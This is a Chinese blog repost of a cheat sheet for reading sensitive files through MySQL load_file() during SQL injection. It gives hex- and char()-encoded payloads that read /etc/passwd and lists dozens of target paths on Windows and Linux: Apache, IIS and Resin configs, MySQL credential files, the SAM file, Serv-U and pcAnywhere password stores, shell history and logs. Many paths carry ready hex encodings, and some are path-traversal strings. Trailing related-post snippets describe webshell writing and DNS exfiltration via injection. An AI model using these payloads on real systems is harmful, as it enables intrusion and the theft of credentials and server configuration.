常见的load_file()读取的敏感信息

最新推荐文章于 2024-02-25 20:42:38 发布
最新推荐文章于 2024-02-25 20:42:38 发布
阅读量8.8k 收藏 144
点赞数 24
文章标签: 运维 php 数据库
原文链接:http://www.cnblogs.com/Loong716/p/9891152.html
版权

转自慕课大巴

 

 

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

5、c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf  查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php  phpmyadmin 爆路径

11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、 /usr/local/app/php5 b/php.ini  PHP 的相当设置

17 、/etc/my.cnf  MYSQL的配置文件

18、 /etc/redhat-release   红帽子的系统版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置

23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini

25、/etc/issue 显示Linux核心的发行版本信息

26、/etc/ftpuser

27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile

28、/etc/ssh/ssh_config


/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp


../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log       
/var/log/httpd/error_log     
../apache/logs/error.log     
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

WINDOWS下:

c:/boot.ini          //查看系统版本     0x633A2F626F6F742E696E690D0A
c:/windows/system32/boot.bat
c:/windows/php.ini   //php配置信息      0x633A2F77696E646F77732F7068702E696E69

c:/windows/my.ini    //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码  0x633A2F77696E646F77732F6D792E696E69

c:/winnt/php.ini      0x633A2F77696E6E742F7068702E696E69

c:/winnt/my.ini       0x633A2F77696E6E742F6D792E696E69

c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码  0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码

0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69
 
c:\Program Files\Serv-U\ServUDaemon.ini   0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69

c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件

c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码

c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif  文件

//存储了pcAnywhere的登陆密码

c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件   
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66

c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.  0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66

c:/Resin/conf/resin.conf  0x633A2F526573696E2F636F6E662F726573696E2E636F6E66


/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机  0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66

d:\APACHE\Apache2\conf\httpd.conf  0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66

C:\Program Files\mysql\my.ini  0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69

c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置    0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C

C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码  0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944


LUNIX/UNIX下:

/etc/passwd  0x2F6574632F706173737764

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/usr/local/app/php5/lib/php.ini //PHP相关设置   0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/etc/sysconfig/iptables //从中得到防火墙规则策略  0x2F6574632F737973636F6E6669672F69707461626C657320

/etc/httpd/conf/httpd.conf // apache配置文件    0x2F6574632F68747470642F636F6E662F68747470642E636F6E66   
 
/etc/rsyncd.conf //同步程序配置文件              0x2F6574632F7273796E63642E636F6E66

/etc/my.cnf //mysql的配置文件   0x2F6574632F6D792E636E66

/etc/redhat-release //系统版本   0x2F6574632F7265646861742D72656C65617365

/etc/issue           0x2F6574632F6973737565

/etc/issue.net       0x2F6574632F69737375652E6E6574
 
/usr/local/app/php5/lib/php.ini //PHP相关设置  0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置   0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件  0x2F6574632F68747470642F636F6E662F68747470642E636F6E66

0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66

/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看  0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上   0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看  

0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66


/etc/sysconfig/iptables 查看防火墙策略 0x2F6574632F737973636F6E6669672F69707461626C6573

load_file(char(47))  列出FreeBSD,Sunos系统根目录


replace(load_file(0x2F6574632F706173737764),0x3c,0x20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 "<" 替换成"空格" 返回的是网页.而无法查看到代码.

转载于:https://www.cnblogs.com/Loong716/p/9891152.html

weixin_30292843
关注
  • 24
    点赞
  • 144
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
load_file() 常用敏感信息.txt
07-18
load_file() 常用敏感信息
load_file经常读的一些敏感文件
weixin_34253539的博客
08-10 223
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/ex...
load_file() 常用敏感信息
weixin_30519071的博客
05-04 119
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网...
本地加载20news
君子不器
03-13 494
第一步:下载,20newsbydate.tar.gz 第二步:/data0/liuyongkang/scikit_learn_data/20news_home 下载好的文件,放在次文件夹下。 第二步: 修改代码 ~/.conda/envs/tf1.9g/lib/python3.6/site-packages/sklearn/datasets$ vim _twenty_newsgroups.py d...
Mysql注入中的outfile、dumpfileload_file函数详解
09-09
攻击者可能会利用它们来读取敏感信息(如`LOAD_FILE()`),或者写入Webshell(如`INTO OUTFILE`和`INTO DUMPFILE`)。因此,对于开发者来说,确保正确配置`secure_file_priv`,并使用参数绑定等方法防止SQL注入是...
php中simplexml_load_file函数用法实例
10-25
主要介绍了php中simplexml_load_file函数用法,以实例形式详细的讲述了simplexml_load_file函数读取XML文件的具体方法,非常具有实用价值,需要的朋友可以参考下
web漏洞“小迪安全课堂笔记”SQL注入
weixin_42902126的博客
03-20 3282
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL注入是什么?注入原理二、使用步骤1.引入库2.读入数据总结参考资料 前言 提示:这里可以添加本文要记录的大概内容: sql注入,总结以下。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL注入是什么? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据.
10-mysql数据注入
qq_56414082的博客
03-03 593
以其他字符替换字符串中的一些字符通过str_replace()函数把select这个关键字函数替换成别,让你无法使用//主要如果没有强调大小写,通过更换就可以绕过,还有编码等情况str_replace例:把字符串 “Hello world!php");?
13.SQL漏洞-高低权限注入&敏感文件读写
mingyqf的博客
03-20 4130
思维导图 【高权限注入及低权限注入】 高用户权限和低用户权限的不同 网站A=数据库A=管理员用户A 存在sql注入漏洞 Root 前提是具有高权限 网站B=数据库B=管理员用户B 没有存在sql注入漏洞 网站C=数据库C=管理员用户C 跨库查询思路 用高权限用户来跨数据库查询 1.获取所有数据库名 http://192.168.80.140/sqlilabs/Less-2/?id=1 and 1=2 union select 1,group_concat(schema_name),3 from
load_files(加载文本文件)
Klay Ye
12-19 5110
sklearn.datasets.load_files Load text files with categories as subfolder names. https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_files.html **os.listdir(path) ** 用于返回指定的文件夹包含的文件...
SQL注入--Load_file与into outfile
weixin_44940180的博客
08-09 2885
Load_file与into outfile 利用into outfile拿到getshall
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2702
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
Linux常见敏感目录
weixin_46622976的博客
02-13 1074
渗透过程中,我们可能会碰到一些任意文件读取,以下是Linux下的常见敏感目录,可以使用burp进行爆破。
SQL注入
SK1ng的博客
09-12 3023
SQL注入 产生原理 参数的传递 数据的接收 数据的交互 数据库的执行 这四个步骤处理不当时,会产生注入点 通过参数传递一个数据,传入的数据直接拼接到之前定义好的SQL语句中,由于未作过滤,可以将一些传递恶意SQL进行拼接,达到执行恶意SQL语句的效果 产生条件 可控变量 可控变量带入数据库查询 变量无过滤或过滤不严谨 危害 可以对数据库进行增、删、改、查等操作 一定条件情况下可以通过注入点直接获取权限 数据库类型 MySQL 注入点 ?example and 1=1 页面正常 ?example
mysql注入中的outfile、dumpfileload_file函数详解
whatday的专栏
10-29 3251
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
mysql 8.0 自定义函数_MySQL之文件读取
weixin_39946274的博客
11-22 477
点击蓝字,关注我们本文作者:flashine (团队成员)本文字数:1200阅读时长:10min附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载读取服务端文件读取文件利用方式load_file()select load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般...
任意文件读取漏洞-linux敏感文件路径字典fuzz
最新发布
qq_82303224_的博客
02-25 603
其中:/var/lib/mlocate/mlocate.db 为linux索引文件包含所有系统文件列表。
mysql导出数据 select load_file("路径“)出现null
爱党人士
04-11 5578
mysql导出数据 select load_file("路径“)出现null 但是该文件确实是有东西的。 我用的是phpstudy。 解决方法`: 打开一个my.ini的文件 然后是在mysqld下的一行添加secure_file_priv= 然后就重启一下mysql 再重新进入,重新输入,立刻ok! 小tips 在输入文件绝对路径的时候,要懂得用\ 用/来表示的话不是不行,而是可能被当作转...
select\.*load_file这个SQL注入举一个例子
09-25
### 回答1: 假设有一个表单,用户可以输入自己的用户名和密码,然后提交给后端进行验证。后端的 SQL 查询语句可能是这样的: ``` SELECT * FROM users WHERE username='输入的用户名' AND password='输入的密码'; ``` 如果攻击者在用户名的输入框中输入以下内容: ``` ' or 1=1;# ``` 那么 SQL 查询语句就会变成这样: ``` SELECT * FROM users WHERE username='' or 1=1;#' AND password='输入的密码'; ``` 这个 SQL 查询语句的意思是选择所有用户或者 1=1(因为 1=1 总是成立),然后以 "#" 注释掉后面的语句。这样攻击者就可以绕过用户名和密码的验证,成功登录系统。 如果攻击者在密码的输入框中输入以下内容: ``` '; SELECT LOAD_FILE("/etc/passwd");# ``` 那么 SQL 查询语句就会变成这样: ``` SELECT * FROM users WHERE username='输入的用户名' AND password=''; SELECT LOAD_FILE("/etc/passwd");#'; ``` 这个 SQL 查询语句的意思是选择用户名为输入的用户名,并且密码为空或执行 `LOAD_FILE("/etc/passwd")` 命令(读取系统的 /etc/passwd 文件)。这样攻击者就可以获取系统的敏感信息,如用户名、UID、GID 等等。 因此,使用 `select\.*load_file` 这种 SQL 注入攻击可以破坏应用的安全性,可能导致数据泄露、系统崩溃等问题。开发者需要谨慎处理用户输入,对于所有的输入都要进行验证和过滤,确保输入不会被用于构造恶意的 SQL 语句。 ### 回答2: SQL注入是一种常见的web安全漏洞,攻击者通过注入恶意的SQL代码来窃取、修改、删除或者破坏数据库中的数据。在这个问题中,我们以select\.*load_file这个SQL注入为例来说明。 load_file是MySQL数据库内置函数,用于读取指定文件的内容。当我们在一个web应用程序中构造一个查询时,如果未正确处理用户输入的数据,可能会导致SQL注入漏洞的发生。 假设我们有一个简单的web应用程序,其中包含一个搜索功能,用户可以输入关键词来搜索相关的文件。后台代码可能是这样的: ```python query = "SELECT * FROM files WHERE name = '" + user_input + "'" result = sql_query(query) ``` 在正常使用情况下,用户输入的关键词会被放在查询语句中的一对引号之间。然而,如果用户恶意构造输入字符串,就可以绕过这种限制,执行恶意的SQL代码。 举个例子,假设用户在搜索框中输入`'; SELECT * FROM users -- `。构造出的查询语句如下: ```sql SELECT * FROM files WHERE name = ''; SELECT * FROM users -- ' ``` 这个查询语句的含义是先查询`files`表中`name`列等于空字符串的记录,然后再查询`users`表中的所有记录。 如果这个恶意构造的输入字符串被直接拼接到查询语句中,并且没有进行合适的处理和过滤,那么攻击者实际上就可以读取、修改或者破坏`users`表中的数据,可能导致安全问题。 为了防止SQL注入漏洞,开发者需要使用参数化查询或者预编译的SQL语句,以确保用户输入的数据被正确地转义和过滤,从而防止恶意注入代码的执行。这样可以保护数据库的安全性,避免潜在的攻击。 ### 回答3: select\.*load_file是一种常见的SQL注入技术,用于读取服务器上的文件内容。以下是一个简单的例子来说明它的用法: 假设一个网站存在一个弱点,允许用户通过输入数字获取对应的文章内容。这个网站使用了以下SQL查询来检索文章: ``` SELECT content FROM articles WHERE id = '输入的数字'; ``` 攻击者可以利用这个弱点来执行select\.*load_file注入。假设服务器上有一个`passwords.txt`文件,里面存储了用户的密码。 攻击者可以通过输入以下内容: ``` 1 UNION ALL SELECT select\.*load_file('path/to/passwords.txt'); ``` 通过这个注入,SQL查询将变成: ``` SELECT content FROM articles WHERE id = '1 UNION ALL SELECT select\.*load_file('path/to/passwords.txt')'; ``` 这个查询将执行两个部分的结果合并,第一个部分是选择文章内容,第二个部分是读取服务器上的`passwords.txt`文件。 结果是,攻击者将成功读取`passwords.txt`文件的内容,并且可以进一步滥用这些信息进行其他攻击行为。 这个例子展示了select\.*load_file作为SQL注入的一个应用场景。重要的是要意识到这种漏洞的存在,并采取相应的安全措施来防止攻击的发生,比如正确过滤和验证用户输入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值